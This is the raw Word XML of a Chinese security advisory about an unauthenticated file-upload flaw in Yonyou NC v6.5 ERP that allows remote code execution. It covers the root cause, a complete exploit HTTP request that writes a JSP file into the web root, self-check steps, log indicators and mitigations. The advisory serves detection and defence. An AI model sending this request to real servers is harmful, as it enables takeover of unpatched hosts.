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bCs/>
          <w:color w:val="DB0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">用友 NC 任意文件上传导致远程命令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Bold" w:hAnsi="DengXian-Bold" w:eastAsia="DengXian-Bold" w:cs="DengXian-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="DB0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">执行漏洞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日期:20220729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 Light" w:hAnsi="等线 Light" w:eastAsia="等线 Light" w:cs="等线 Light"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="DB0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">一、漏洞概况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用友 NC 是用友软件公司主打互联网平台型的 ERP 系统。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近期监测到用友 NC 系统 V6.5 版本存在任意文件上传漏洞。攻击者无需账号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密码，可利用该漏洞上传恶意文件，进而完全控制主机。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-Bold" w:hAnsi="MicrosoftYaHei-Bold" w:eastAsia="MicrosoftYaHei-Bold" w:cs="MicrosoftYaHei-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="DB0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">二、漏洞处置优先级(VPT)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综合处置优先级：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线" w:cs="等线"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>高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具体评价详情：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漏洞评价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漏洞类型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FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">文件上传、RCE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公开程度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FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">疑似 0day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利用前置条件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FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">不需要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利用交互要求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FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">0-click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漏洞利用情报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漏洞利用情报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FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">未知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漏洞活跃度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FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">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影响产品评价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受影响版本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FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">用友 NC v 6.5 版本, 其他版本可能也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FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">受影响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影响范围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FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">一般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有无修复补丁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FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">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产品使用场景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FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">办公软件-ERP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-Bold" w:hAnsi="MicrosoftYaHei-Bold" w:eastAsia="MicrosoftYaHei-Bold" w:cs="MicrosoftYaHei-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="DB0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">三、漏洞复现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原理分析 </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="350583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smartUpload对象，设置了可以传输的文件类型（其中包括jsp文件），并通过getFilename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在 http 请求中获取文件名。获取到文件名后拼接“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\\”，作为文件的写入路径，最终调用 saveAs 完成保存操作。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利用过程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Step1：上传文件 </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="299529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Step2：访问执行已经上传的 JSPStep1 </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="2998470"/>
            <wp:effectExtent l="0" t="0" r="139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上传文件操作的完整数据包：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POST /aim/equipmap/accept.jsp HTTP/1.1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Host: xxxx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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8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Content-Type:multipart/form-data; boundary=---------------------------16314487820932200903769468567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Accept-Language: en-US,en;q=0.5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Accept-Encoding: gzip, deflate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Connection: close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Upgrade-Insecure-Requests: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Content-Type: application/x-www-form-urlencoded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Content-Length: 436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-----------------------------16314487820932200903769468567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Content-Disposition: form-data; name="upload"; filename="222222.txt"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Content-Type: text/plain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&lt;% out.println("bea86d66a5278f9e6fa1112d2e2fcebf"); %&gt;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-----------------------------16314487820932200903769468567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Content-Disposition: form-data; name="fname"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 xml:space="preserve">\webapps\nc_web\180900fd668c51631353aca37fc1f829.jsp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>-----------------------------16314487820932200903769468567--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-Bold" w:hAnsi="MicrosoftYaHei-Bold" w:eastAsia="MicrosoftYaHei-Bold" w:cs="MicrosoftYaHei-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="DB0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">四、漏洞自查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Step1: 检查相关资产是否存在/aim/equipmap/accept.jsp 路径；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Step2: 向待测试目标发送【第三节】的数据包：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Step3: 直接上传的 JSP，如果成功说明漏洞存在。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-Bold" w:hAnsi="MicrosoftYaHei-Bold" w:eastAsia="MicrosoftYaHei-Bold" w:cs="MicrosoftYaHei-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="DB0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">五、排查是否已经被攻击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1. 排查 web 访问日志中是否包含以下特征：包含/aim/equipmap/accept.jsp 字样；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2. 检查 web 目录中是否存在非用友 NC 自带的 jsp 或 jspx 文件，或其他近期生成的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文件。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-Bold" w:hAnsi="MicrosoftYaHei-Bold" w:eastAsia="MicrosoftYaHei-Bold" w:cs="MicrosoftYaHei-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="DB0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">六、修复建议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临时修复方案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1. 更新 WAF 或者流量检测设备规则：将以上特征加入黑名单；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2. 对用友 NC，尤其是 /aim/equipmap/accept.jsp 路径，强化访问控制策略，加强监控。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Bold" w:hAnsi="DengXian-Bold" w:eastAsia="DengXian-Bold" w:cs="DengXian-Bold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官方修复方案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尚无官方修复补丁。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YaHe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xNzJjYTE1NmNkMDViYTkyNWU4YmViMzE0MmMxMDkifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="11F85D7B"/>
    <w:rsid w:val="02693149"/>
    <w:rsid w:val="11F85D7B"/>
    <w:rsid w:val="155D5602"/>
    <w:rsid w:val="1609105D"/>
    <w:rsid w:val="21BE2E1C"/>
    <w:rsid w:val="371F02E4"/>
    <w:rsid w:val="57610B9F"/>
    <w:rsid w:val="64264155"/>
    <w:rsid w:val="716342F2"/>
    <w:rsid w:val="72BA2638"/>
    <w:rsid w:val="757C2E60"/>
    <w:rsid w:val="7E91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市中级人民法院</Company>
  <Pages>4</Pages>
  <Words>574</Words>
  <Characters>760</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>859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2022-07-31T06:57:00Z</dcterms:created>
  <dc:creator>宝宝很生气</dc:creator>
  <cp:lastModifiedBy>宝宝很生气</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-31T07:08:57Z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EE1A1439DD0740DEB0CDEA93A71FB314</vt:lpwstr>
  </property>
</Properties>
</file>